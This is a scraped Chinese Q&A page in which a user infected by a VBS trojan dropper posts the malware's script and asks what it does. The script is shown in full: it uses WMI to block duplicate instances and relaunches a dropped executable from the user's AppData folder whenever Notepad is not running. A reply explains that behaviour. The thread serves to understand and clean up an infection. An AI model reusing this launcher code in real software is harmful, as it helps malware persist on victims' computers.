有人可以帮我理解这段代码吗?感染了Trojan Dropper VBS脚本

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了有人可以帮我理解这段代码吗?感染了Trojan Dropper VBS脚本相关的知识,希望对你有一定的参考价值。

我想先说对不起,

这可能是问这些事情的最好的地方,但我被病毒感染了,似乎留下了痕迹。

如果有人能理解一些脚本背后的代码,我将非常感激。

Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%System32Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else 
    Do
        Pause(10) ' Pause 10 seconds 
        If CheckProcess(DblQuote(ProcessPath)) = False Then
            Call Logoff() 
        End If  
    Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
    strComputer = "."
    Tab = Split(ProcessPath,"")
    ProcessName = Tab(UBound(Tab))
    ProcessName = Replace(ProcessName,Chr(34),"")
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\" & strComputer & "
ootcimv2")
    Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'")
    If colProcesses.Count = 0 Then
        CheckProcess = False
    Else
        CheckProcess = True
    End if
End Function
'**************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
   Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:UsersSblckAppDataLocalAppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit 
End sub
'**************************************************************************
Sub Pause(Secs)    
    Wscript.Sleep(Secs * 1000)    
End Sub   
'**************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\.
ootcimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function    
'***************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "", "\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'****************************************************************************

我希望我正确格式化代码,有一些其他脚本,但是以txt形式,不同之处在于objShell.Exec它会调用“%working%”,如下所示:

objShell.Exec("%working%")^

如果它更容易,我会发布它的pastebin's

AppVShNotifytvbs.vbs PasteBin link

AppVShNotifytvbs.txt Pastebin link

答案

首先,它检查前一个实例,以查看当前脚本是否已使用另一个进程ID运行。

然后,每隔10秒检查记事本是否正在运行。如果不是,则调用AppVShNotifyt.exe

以上是关于有人可以帮我理解这段代码吗?感染了Trojan Dropper VBS脚本的主要内容,如果未能解决你的问题,请参考以下文章

有人可以帮我找到这段代码中的瓶颈吗?

Opencv 代码 - 有人可以帮我理解代码在做啥吗

有人可以帮我理解appendChild方法实际发生了什么吗?

Trojan是啥病毒 能做啥?我电脑每星期大都中这个

trojan.clicker.script.js.redirrector.a是啥病毒,怎么杀

有人可以帮我修复错误 pls-00049 吗?